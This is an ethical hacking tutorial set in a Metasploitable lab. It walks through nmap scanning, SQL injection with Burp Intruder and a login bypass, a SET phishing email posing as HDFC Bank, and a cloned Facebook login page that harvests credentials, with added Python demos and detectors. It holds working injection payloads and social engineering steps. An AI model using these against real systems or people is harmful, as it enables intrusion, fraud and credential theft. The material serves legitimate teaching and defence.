
Ethical hacking attacks using Kali Linux

Vandhana Venugopalan, CISA, AWS CCP

Vice President, Cybersecurity and Technology at Chase UK


April 2, 2020
"There are only two types of companies: those that have been hacked, and those that will be."
- Robert Mueller, FBI Director, USA

Hacking and cyber-crime stories arrive daily from all over the web. To stay safe and not
become prey to such attacks, it is high time to know the weaknesses in the networks and
systems we work on and to be watchful of the common attack methods that hackers use.
Remember: to attack someone you need to know their weaknesses, not their strengths! It is
time for us to put on the 'hacker's hat' (in an ethical way!) to look at the exploitation
opportunities through an attacker's eyes and stay covered. Let's get started.

EXECUTIVE SUMMARY
The purpose of this project publication is to walk readers through some well-established
penetration testing and ethical hacking attack methods, using Kali Linux tools against the
Metasploitable vulnerable server and the websites hosted on it. These methods gather
sensitive information and exploit the identified vulnerabilities, and give the footing from
which further, more advanced methods can proceed.

**Disclaimer** This publication is a detailed narrative on 6 hacking methods, with the steps
to perform them and the expected results. You can jump between sections if you are
interested in reading only about a few of the specific attacks.

1. Information Gathering
2. Vulnerability analysis
3. Web Penetration test
4. Exploitation tools
5. Email Phishing attack
6. Website Cloning

Lab requirements:

1. Oracle VirtualBox environment
2. Virtual machine to perform the attack- Kali Linux
3. Vulnerable server to attack- Metasploitable

LAB SETUP
A testing lab is to an ethical hacker what a practice field is to an athlete. It is the place
where we get our hands dirty, gathering information and performing practical attack
methods against deliberately weak systems.

The penetration testing lab is set up on VirtualBox, as it allows us to create virtual
machines inside the current OS (the host OS).

To set up the lab environment, the following programs need to be downloaded and installed:

1. Oracle VirtualBox (for the OS on your computer)

Download page: https://www.virtualbox.org/wiki/Downloads

2. Attacker machine- Kali Linux

Download page: https://www.kali.org/downloads/

3. Victim (vulnerable machine)- Metasploitable 2

(This is a deliberately vulnerable Linux VM that contains a number of weaknesses for pen
testers to find and exploit. It must never be exposed to an untrusted network.)

Download page: https://information.rapid7.com/metasploitable-download.html


NOTE: This project pertains to performing the attack methods with a base prerequisite of
having the lab environment set up. Configuring the lab environment is not covered as a part
of the narrative.

Here is a snapshot of the VirtualBox lab environment once the virtual machines are
successfully installed.

Before running the attack methods, make sure to gather the IP address of the victim
machine, in this case the Metasploitable machine. On its console, type ifconfig and note the
IP address, which in this lab is 10.0.2.4. Both VMs need to be on the same VirtualBox
network (a NAT Network or a host-only adapter) so that the Kali machine can reach this
address.
PENETRATION TESTING- TYPES AND ATTACK METHODS
Penetration testing, also called pen testing or ethical hacking, is the practice of testing a
computer system, network or web application to find security vulnerabilities that an attacker
could exploit. The process involves gathering information about the target before the test,
identifying possible entry points, attempting to break in, and reporting back the findings.

Types of pen test:

1. Black Box Pen test- The tester has no prior knowledge of the systems to be tested and
does not examine any source code; the test starts from the outside, as a real attacker would.

2. White Box Pen test- The most comprehensive form of testing, as the tester is provided
with the whole range of information about the systems and/or network, including source
code and configuration.

3. Grey Box Pen test- The tester is provided with partial or limited information about the
internal details of the system, such as a normal user's credentials or an architecture overview.

Ethical Hacking- Attack tools in Kali Linux:

Kali Linux is one of the best-known security distributions for ethical hackers; it contains a
set of attack tools classified by the phases of a pen test. It is open source and its official
web page is https://www.kali.org

Below are some of the built-in penetration testing programs provided by Kali Linux, used in
the six attack methods that follow:
1. INFORMATION GATHERING
Tool used- NMAP

Nmap is the tool used for the initial information-gathering and network-scanning phase of
ethical hacking in Kali Linux.

Nmap uses raw IP packets in novel ways to determine which hosts are available on the
network, what services (application name and version) those hosts are offering, which
operating systems (and OS versions) they are running, what type of packet filters/firewalls
are in use, etc.

Target to scan: Metasploitable vulnerable server with IP Address: 10.0.2.4

Step 1 − Open Applications→ 01-Information Gathering → nmap.

Step 2- Use the nmap command to scan and identify the open ports:

nmap 10.0.2.4

(Add -sV to have nmap probe each open port for the actual application name and version;
without it, the SERVICE column is only nmap's guess from the port number.)

Step 3- Analysing the scan results- As shown in the results screen above, 23 ports are open
on the target. An open port means a service is listening and reachable from the attacker
machine, so each one is a candidate entry point; it is not by itself proof of a vulnerability.
The SERVICE column shows which service conventionally uses the port.

For example-

80/tcp is HTTP: the web applications hosted there can be probed for web vulnerabilities
(this is what the following sections do).

513/tcp is the rlogin ("login") service, a cleartext remote-login protocol: password-guessing
attacks and sniffing can be targeted at this port.
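As an added example (not from the article), here is a small Python script that parses nmap's grepable output (nmap -oG) and picks out the open ports that deserve a closer look. The scan output embedded in it is constructed to resemble a default scan of Metasploitable 2 rather than copied from the lab above, and the watch list of services is the example's own judgement; with a real target, run nmap -sV -oG scan.gnmap 10.0.2.4 and feed that file to parse_grepable instead.

```python
# Constructed nmap grepable (-oG) output, shaped like a default TCP scan of
# Metasploitable 2; it is not a capture from the article's lab, but the port
# list matches the 23 open ports the article's screenshot reports.
GREPABLE_OUTPUT = (
    "# Nmap 7.80 scan initiated as: nmap -oG - 10.0.2.4\n"
    "Host: 10.0.2.4 ()\tStatus: Up\n"
    "Host: 10.0.2.4 ()\tPorts: 21/open/tcp//ftp///, 22/open/tcp//ssh///, "
    "23/open/tcp//telnet///, 25/open/tcp//smtp///, 53/open/tcp//domain///, "
    "80/open/tcp//http///, 111/open/tcp//rpcbind///, 139/open/tcp//netbios-ssn///, "
    "445/open/tcp//microsoft-ds///, 512/open/tcp//exec///, 513/open/tcp//login///, "
    "514/open/tcp//shell///, 1099/open/tcp//rmiregistry///, 1524/open/tcp//ingreslock///, "
    "2049/open/tcp//nfs///, 2121/open/tcp//ccproxy-ftp///, 3306/open/tcp//mysql///, "
    "5432/open/tcp//postgresql///, 5900/open/tcp//vnc///, 6000/open/tcp//X11///, "
    "6667/open/tcp//irc///, 8009/open/tcp//ajp13///, 8180/open/tcp//unknown///"
    "\tIgnored State: closed (977)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)

# Services worth a closer look because they authenticate in the clear or were
# never meant to face a network. This mapping is the example's own judgement.
LEGACY_OR_CLEARTEXT = {
    "ftp": "cleartext credentials",
    "telnet": "cleartext credentials",
    "exec": "rexec, cleartext credentials",
    "login": "rlogin, cleartext credentials / host trust",
    "shell": "rsh, host trust instead of passwords",
    "vnc": "often password-only, no encryption",
    "X11": "display server exposed to the network",
}


def parse_grepable(text):
    """Return {port: {"proto", "service", "version"}} for every open port.

    Each entry in the Ports: field is port/state/proto/owner/service/rpc/version,
    so splitting on "/" and keeping the first seven pieces is enough.
    """
    open_ports = {}
    for line in text.splitlines():
        if "Ports:" not in line:
            continue  # comment lines and the "Status: Up" line carry no ports
        ports_field = line.split("Ports:", 1)[1].split("\t")[0]
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 7:
                continue
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            if state == "open":
                open_ports[int(port)] = {"proto": proto, "service": service, "version": version}
    return open_ports


def triage(open_ports):
    """[(port, service, reason)] for the open ports on the watch list, sorted by port."""
    return sorted(
        (port, info["service"], LEGACY_OR_CLEARTEXT[info["service"]])
        for port, info in open_ports.items()
        if info["service"] in LEGACY_OR_CLEARTEXT
    )


if __name__ == "__main__":
    ports = parse_grepable(GREPABLE_OUTPUT)
    print("%d open ports" % len(ports))
    for port, service, reason in triage(ports):
        print("%5d/tcp %-8s %s" % (port, service, reason))
```

The version field is empty here because the constructed scan ran without -sV; once it is populated it is the value you look up for known issues, which is the bridge from "open" to "vulnerable".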

2. VULNERABILITY ANALYSIS
Tool used- NMAP

Nmap can also be used to scan for known weaknesses in the target server through its
scripting engine (NSE). There are a vast number of scripts to check for specific weaknesses;
here we are going to check whether the web server is exposed to SQL injection.

Target to scan: Metasploitable vulnerable server with IP Address: 10.0.2.4

Step 1 − Open Applications→ 02-Vulnerability Analysis → nmap.

Step 2- Use the nmap command to run the SQL injection script against the web port:

nmap -p80 --script http-sql-injection 10.0.2.4

The script spiders the site, appends an injection payload (such as a stray single quote) to
the parameters of the URLs it finds, and reports any response that contains a database
error message. Its findings are therefore error-based indications, not confirmed exploits,
and each one should be verified by hand.

Step 3- Analysing the scan output- As shown in the results screen above, there are multiple
web application URLs hosted on the server that respond as if vulnerable to SQL injection.

For example-
•The results show login.php and user-info.php are exposed to SQL injection attacks (we
will work through both in sections 3 and 4).

•It is also evident that many sensitive pages, such as password and admin account pages,
are flagged as vulnerable to SQL injection.
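The following Python is an added example, not the article's code and not nmap's NSE script: it re-implements the idea behind http-sql-injection in miniature, appending a single quote to each query parameter in turn and flagging responses that contain a database error signature. The target URL, the short signature list and fake_fetch (a stand-in for the HTTP request that answers with a constructed MySQL error, as the verbose error page in section 4 shows Mutillidae does) are all assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Error strings of the kind nmap's http-sql-errors.lst matches; hand-picked for
# the example, not the script's full data file.
ERROR_SIGNATURES = [
    r"You have an error in your SQL syntax",   # MySQL
    r"Warning: mysql_",                         # PHP mysql_* warnings
    r"unterminated quoted string",              # PostgreSQL
    r"Unclosed quotation mark",                 # Microsoft SQL Server
    r"SQLSTATE\[",                              # PDO
]

# The page the article's scan flagged, with its parameters (constructed URL).
TARGET = "http://10.0.2.4/mutillidae/index.php?page=user-info.php&username=admin&password=x"


def probe_urls(url, payload="'"):
    """Yield (parameter, url) pairs, each with the payload appended to one parameter only."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for i, (name, value) in enumerate(params):
        mutated = list(params)
        mutated[i] = (name, value + payload)
        yield name, urlunsplit(parts._replace(query=urlencode(mutated)))


def looks_injectable(body):
    """Signatures found in a response body (an empty list means nothing error-like)."""
    return [sig for sig in ERROR_SIGNATURES if re.search(sig, body)]


def scan(url, fetch):
    """Run every probe through fetch(url) -> body and collect the parameters that
    produced a database error. Error-based only: a hit is a lead, not a confirmed exploit."""
    findings = {}
    for param, probe in probe_urls(url):
        hits = looks_injectable(fetch(probe))
        if hits:
            findings[param] = hits
    return findings


def fake_fetch(url):
    """Constructed stand-in for the HTTP request so the example runs offline: answer
    with a MySQL error whenever the username parameter carries an unbalanced quote."""
    params = dict(parse_qsl(urlsplit(url).query))
    if "'" in params.get("username", ""):
        return ("<p>Error executing query: You have an error in your SQL syntax; check the "
                "manual that corresponds to your MySQL server version for the right syntax "
                "to use near ''' at line 1</p>")
    return "<p>Results for %s</p>" % params.get("username", "")


if __name__ == "__main__":
    for param, probe in probe_urls(TARGET):
        print(param, "->", probe)
    # With a real target, replace fake_fetch with a function that performs the HTTP GET.
    print(scan(TARGET, fake_fetch))
```

Only the username parameter produces an error here; the page and password parameters get the same probe but the constructed server ignores them, which is exactly the per-parameter reporting the nmap script gives you.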

3. WEB PENETRATION TESTING- INTRUDER ATTACK
Tool used- Burp Suite

Now that we have gathered information on the basic vulnerabilities in the server's web
applications, we are going to attack some of those vulnerabilities.

Here we intercept and fuzz the login form of one of the vulnerable websites listed in the
vulnerability scan results, Mutillidae. Below are the steps for running a Burp Intruder attack
through Burp's proxy.

Step 1: Launch the Metasploitable home page in the Kali Linux browser using the IP address
10.0.2.4 gathered earlier from the Metasploitable console.

Step 2: Click on the web application Mutillidae. Follow the menu options: OWASP Top 10 ->
Injection (SQL) -> Extract Data -> User Info. You will be greeted with a login screen.

Step 3: Now configure the attack browser. Open the browser's Preferences -> Advanced ->
Network -> Settings next to Connection, select Manual proxy configuration and enter
127.0.0.1 as the HTTP Proxy and 8080 as the Port. Apply the changes and close. The proxy is
set up; from now on every request the browser makes goes through Burp.

Step 4: Launch Burp Suite and open a new (temporary) project. Burp listens on
127.0.0.1:8080 by default, which is why that address was used in the browser.

Step 5: Navigate to the Proxy tab and make sure Intercept is on. Then toggle back to the
login page, enter an arbitrary username and password, and attempt to log in: the browser
hangs and the request appears in Burp's Intercept window.

NOTE: We're primarily interested in the username field since this is what we will modify to
test for SQL injection flaws.

Step 6: Click on the Action button, then Send to Intruder.

Step 7: Configure positions and payloads. In the Intruder -> Positions tab you will see the
intercepted request; click Clear to remove the automatically marked positions, highlight the
value entered for username, and click Add. We will use the Sniper attack type, which runs
through the payload list and tries the values one at a time in that single position.
Step 8: SQL injection- The application's login query has the form:

SELECT username, password FROM users WHERE username='myname' AND password='mypassword';

The classic injection payload for the username field, ' or 1=1--, turns it into:

SELECT username, password FROM users WHERE username='' or 1=1-- AND password='';

The injected single quote closes the username string early, leaving an empty username;
or 1=1 is always true; and -- starts a comment, so the rest of the statement, including the
password check, is ignored. The WHERE clause is therefore true for every row and the
database returns account data. (MySQL only treats -- as a comment when it is followed by a
space, so wordlist entries usually carry a trailing space or use # instead.)

Step 9: Setting up the payload: In the Payloads tab, load a word list. Kali comes with a
variety of word lists, including one specifically for testing SQL injection flaws. Hit Load and
navigate to /usr/share/wordlists/wfuzz/injection/SQL.txt. Now we are prepared to launch
our attack!

Step 10: Click the Start attack button, and a new window will pop up showing the Intruder
attack. Once Intruder is finished, you can view the details of any request simply by clicking
on it. Sorting the results by response length or status code quickly separates the payloads
that changed the application's behaviour from those that did not.

Step 11: Analyse the results- Select the SQL injection query line record in the Burp Suite
window as shown below. On clicking the 'Response' tab you can see the actual web page
render, with the list of usernames and passwords returned by this injection.

4. EXPLOITATION TOOLS
Method used- SQL injection

Sometimes the username is the only information available and the password for the
account is not exposed by other hacking methods. Verbose SQL database errors can then be
used to learn the shape of the login query, inject into it, and bypass the login prompt.

Step 1: Open the Metasploitable server in the Kali Linux browser and launch the Mutillidae
login page.

Step 2: Knowing that one of the login account names is 'admin', we are going to try and
bypass its login. First, enter a random username and password to see how the page
responds and gather error information.

Username: vandy, password: sdfsdfs

The database error displayed includes the query that failed:

SELECT * from ACCOUNTS where username='vandy' AND password='sdfsdfs'

Because the error page exposes the query, we now know exactly where our input lands:
whatever is typed as the password goes between the single quotes in password='...'. We can
close that string ourselves and append a condition that is always true, so that the whole
WHERE clause evaluates to true. Note that the application appends a closing quote after our
input; a payload ending in OR 1=1 would leave that quote dangling and produce another
syntax error, so the payload has to account for it: either end with an opening quote that the
application's closing quote completes, or comment the rest of the line out (-- followed by a
space, or # in MySQL). With the payload sdfsdfs' OR '1'='1 the executed query becomes:

SELECT * from ACCOUNTS where username='admin' AND password='sdfsdfs' OR '1'='1'

Because AND binds tighter than OR, this reads as (username='admin' AND
password='sdfsdfs') OR '1'='1', which is true for every row, so the database returns the
whole accounts table. Back on the login page, enter username=admin and
password=sdfsdfs' OR '1'='1. This clears the login prompt, and we are logged in as 'admin'
without knowing the password, because the application logs in the first row returned,
which here is admin.
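As an added example covering both the Intruder run in section 3 and the login bypass in section 4 (it is not Mutillidae's code and not from the original article), the Python below builds a throwaway SQLite accounts table, implements the login query by string concatenation the way the error page in section 4 shows, runs a Sniper-style loop over a handful of payloads in the username position, and then shows the same payloads failing against a parameterised version of the query. The table contents and the payload list are constructed here; SQLite is used because it runs anywhere, and where its comment syntax differs from MySQL's the comments say so.

```python
import sqlite3

# Constructed accounts table standing in for Mutillidae's ACCOUNTS (not its real data).
ACCOUNTS = [
    ("admin", "adminpass"),
    ("adrian", "somepassword"),
    ("vandy", "letmein"),
]


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    db.executemany("INSERT INTO accounts VALUES (?, ?)", ACCOUNTS)
    return db


def login_vulnerable(db, username, password):
    """The injectable form: user input is pasted straight into the SQL text, exactly
    the pattern the verbose error in section 4 reveals. Returns the matching rows, or
    the error text (as the error page would) when the injected SQL does not parse."""
    query = ("SELECT username, password FROM accounts "
             "WHERE username='%s' AND password='%s'" % (username, password))
    try:
        return db.execute(query).fetchall()
    except sqlite3.OperationalError as exc:
        return "DB ERROR: %s -- query was: %s" % (exc, query)


def login_fixed(db, username, password):
    """The remediation: placeholders keep the input as data, never as SQL."""
    query = "SELECT username, password FROM accounts WHERE username=? AND password=?"
    return db.execute(query, (username, password)).fetchall()


# A miniature stand-in for /usr/share/wordlists/wfuzz/injection/SQL.txt (constructed).
SQL_PAYLOADS = [
    "admin",          # control: plain username with the wrong password -> no rows
    "' or 1=1--",     # closes the string, always true, comments out the password check
    "' OR '1'='1",    # no comment: AND binds tighter than OR, so the password check survives
    "admin'--",       # targets one account directly
    "' or 1=1#",      # MySQL-style # comment; SQLite has no '#', so this errors instead
]


def sniper(db, login, payloads, fixed_password="wrongpassword"):
    """Burp Intruder 'Sniper' style: one position (username), each payload in turn,
    everything else held constant; record what came back for each payload."""
    return {p: login(db, p, fixed_password) for p in payloads}


def bypasses(results):
    """The Intruder rows worth clicking on: payloads that returned account data."""
    return [p for p, out in results.items() if isinstance(out, list) and out]


if __name__ == "__main__":
    db = build_db()
    for payload, out in sniper(db, login_vulnerable, SQL_PAYLOADS).items():
        print("%-14r -> %s" % (payload, out))
    # Section 4's bypass through the password field. The application adds a closing
    # quote after our input, so the payload must supply the matching opening quote.
    print(login_vulnerable(db, "admin", "sdfsdfs' OR 1=1"))      # dangling quote: DB error
    print(login_vulnerable(db, "admin", "sdfsdfs' OR '1'='1"))   # every row comes back
    print(login_fixed(db, "admin", "sdfsdfs' OR '1'='1"))        # parameterised: no rows
```

The two payloads that return rows (' or 1=1-- and admin'--) are the ones that would stand out in Intruder by response length; ' OR '1'='1 is a reminder that a payload which is "always true" on paper still fails when operator precedence leaves the password check in force.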

5. EMAIL PHISHING ATTACK

Tool used: Social Engineering Toolkit (SET)
One of the most common (and most interesting) social engineering attacks is phishing.
Emails are made to appear to come from a genuine source in order to gather sensitive and
confidential information from the customer, which can then be used in further attacks.

SET is a tool shipped with Kali Linux through which email attacks can be performed,
dressing the message up to appear as if it came from a legitimate body. Here is an example:

Step 1: Launch Applications -> Social Engineering -> SET in Kali Linux, as shown below.

The home screen looks as below, with the social engineering menu options.

Step 2: On choosing the mail attack options shown above, the toolkit prompts with a short
questionnaire to build the mail template to the attacker's requirements. In this example, I
have dressed the email up as coming from a top bank in order to gather credit card details.

Step 3: Provide the email subject and body in a way that triggers a sense of urgency in the
reader's mind to share the sensitive information immediately.

In the example above, the attacker's address is a fake "bank" email ID meant to pass as
HDFC Bank's:

Attacker's email: hdfccreditcardservicemail@gmail.com

Victim's email: pentestattack678@gmail.com

Note what is and is not spoofed here. The message is sent from a real Gmail account whose
local part merely mentions HDFC, so the deception lives in the display name, subject and
body rather than in a forged hdfcbank.com sender; sender-authentication checks (SPF/DKIM)
on the receiving side typically pass for gmail.com and say nothing about HDFC. What the
victim sees is the brand and the urgency.

After executing the SET attack above, below is how the email is received at the victim's end,
creating a sense of urgency and panic to share the confidential information.
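Added example (not part of the original article and not SET's code): a Python check of the kind a mail filter or an analyst would run on the message above, looking for a brand name in the display name that does not match the sender's domain, for a Reply-To that diverts replies elsewhere, and for urgency language in the subject. The raw messages are constructed to mirror the attacker and victim addresses the section names; the brand-to-domain mapping and the word list are assumptions of the example.

```python
from email import message_from_string
from email.utils import parseaddr

# Constructed message modelled on the section's phish: same attacker and victim
# addresses, invented subject/body, headers as a receiving server might add them.
RAW_PHISH = """From: HDFC Bank Credit Card Services <hdfccreditcardservicemail@gmail.com>
To: pentestattack678@gmail.com
Reply-To: hdfccreditcardservicemail@gmail.com
Subject: URGENT: your credit card will be blocked in 24 hours
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=gmail.com
Content-Type: text/plain; charset="utf-8"

Dear customer, confirm your card number, expiry date and CVV immediately
using the link below, or your card will be blocked.
"""

# Constructed control message for comparison.
RAW_LEGIT = """From: HDFC Bank Alerts <alerts@hdfcbank.com>
To: pentestattack678@gmail.com
Subject: Your monthly statement is ready
Content-Type: text/plain; charset="utf-8"

Your statement for March is available in net banking.
"""

# Which sending domains each brand is expected to use (an assumption of this example).
BRAND_DOMAINS = {"hdfc": {"hdfcbank.com"}}
URGENCY_WORDS = ("urgent", "immediately", "within 24 hours", "blocked", "suspended")


def sender_domain(header_value):
    """Domain part of an address header, or "" when the header is missing or malformed."""
    _display, addr = parseaddr(header_value or "")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def analyse(raw):
    msg = message_from_string(raw)
    display, _addr = parseaddr(msg["From"] or "")
    from_domain = sender_domain(msg["From"])
    findings = []
    # 1. A brand in the display name that does not match where the mail comes from.
    for brand, domains in BRAND_DOMAINS.items():
        if brand in display.lower() and from_domain not in domains:
            findings.append("display name claims %s but sender domain is %s" % (brand, from_domain))
    # 2. Reply-To pointing somewhere other than the sender (replies go to the attacker).
    reply_domain = sender_domain(msg["Reply-To"])
    if reply_domain and reply_domain != from_domain:
        findings.append("Reply-To domain %s differs from From domain" % reply_domain)
    # 3. Pressure language in the subject line.
    hits = [w for w in URGENCY_WORDS if w in (msg["Subject"] or "").lower()]
    if hits:
        findings.append("urgency language in subject: " + ", ".join(hits))
    # An SPF pass for gmail.com (see Authentication-Results above) is genuine and
    # proves nothing about HDFC, which is why check 1 is the one that matters here.
    return {"from_display": display, "from_domain": from_domain, "findings": findings}


if __name__ == "__main__":
    for raw in (RAW_PHISH, RAW_LEGIT):
        print(analyse(raw))
```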
6. WEBSITE CLONING
Tool used: Social Engineering Toolkit (SET)

This is another common method for harvesting username and password details from a
user: clone one of the popular social media sites and serve the copy from our own system,
so that its login form posts to our IP address. Below is an example where we clone
www.facebook.com's login page.

Step 1: Launch Applications -> Social Engineering -> SET in Kali Linux, as shown below.

The home screen looks as below, with the social engineering menu options.

Step 2: Select the following options to launch the website clone attack:

Social-Engineering Attacks -> Website Attack Vectors -> Credential Harvester Attack
Method -> Site Cloner

Step 3: Provide the IP address on which the clone will be served and to which the harvested
credentials will be posted back. In this lab that is the Kali machine's own address, obtained
by running ifconfig in Kali Linux: in my case 10.0.2.15, which is plugged in as below. (It is
"external" only from the victim's point of view; a real attacker would use an address or
hostname the victim can reach.)

Step 4: Now provide the public social media site that you would like to clone onto that
address to capture the user credentials. In my example, I have used facebook.com.

Step 5: Cloning is now complete! Open the IP address in the web browser as below: the page
served from 10.0.2.15 looks exactly like the Facebook login page. Note the IP address
10.0.2.15 in the address bar of the screen below, which is the one giveaway a careful user
has.

Step 6: Log in with any test email and password and hit Login.

Step 7: As this is a cloned website and its form posts to the local system, the credentials
entered on the page are recorded in the local file system under the path below:

/var/www/html/

This path contains the harvester .txt file, a log of what the victim user entered on the
cloned login page, as below.
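Added example, not from the original article or from SET: a Python snippet showing the two sides of step 7. offsite_forms is the check a user, browser extension or proxy could apply, flagging any form on a page whose action posts somewhere other than the brand it imitates; harvest_record is what a harvester keeps from a single POST. The HTML fragment and the POST body are constructed for the example (the real Facebook markup is not reproduced).

```python
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urljoin, urlsplit

# Constructed fragment of a cloned login page as served from the attacker VM; only
# the property that matters is kept: the form looks the same but posts to 10.0.2.15.
CLONED_HTML = """<html><body>
<form id="login_form" action="http://10.0.2.15/" method="post">
  <input type="email" name="email" placeholder="Email address or phone number">
  <input type="password" name="pass" placeholder="Password">
  <button type="submit">Log In</button>
</form>
</body></html>"""


class FormCollector(HTMLParser):
    """Collect the attributes of every <form> on the page."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.forms.append(dict(attrs))


def offsite_forms(html, page_url, expected_host):
    """Forms whose submit target is not the brand's own domain: [(form id, absolute action)].

    Relative actions are resolved against page_url, so a clone served from the
    attacker's address is caught even when the action is just "/login.php".
    """
    collector = FormCollector()
    collector.feed(html)
    suspicious = []
    for form in collector.forms:
        target = urljoin(page_url, form.get("action") or "")
        host = (urlsplit(target).hostname or "").lower()
        if host != expected_host and not host.endswith("." + expected_host):
            suspicious.append((form.get("id"), target))
    return suspicious


def harvest_record(post_body):
    """What the harvester keeps from one submitted form: the decoded field values."""
    return dict(parse_qsl(post_body, keep_blank_values=True))


if __name__ == "__main__":
    print(offsite_forms(CLONED_HTML, "http://10.0.2.15/", "facebook.com"))
    # A constructed POST body, as the browser sends it when the victim clicks Log In.
    print(harvest_record("email=test%40example.com&pass=Passw0rd%21"))
```

The harvester does not need the victim's browser to do anything unusual: a normal form submission to the attacker's host is enough, which is why the only reliable defence on the user side is checking the address the page is served from and the address the form posts to.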

Alright, that's a lot of learning! Go ahead and try them out. Below are some references
that can be used for further learning and experiments:

1. Cybersecurity resources from ISACA: https://cybersecurity.isaca.org/csx-resources
2. Web Security Academy by PortSwigger: https://portswigger.net/web-security
3. TechTarget knowledge blog: https://searchnetworking.techtarget.com/tutorial/Penetration-testing-strategies
4. GitHub penetration testing topic: https://github.com/topics/penetration-testing
5. Cybrary online free courses and resources: https://www.cybrary.it/course/ethical-hacking/
6. Udemy pen test online courses: https://www.udemy.com/topic/penetration-testing/
7. zSecurity: https://zsecurity.org/
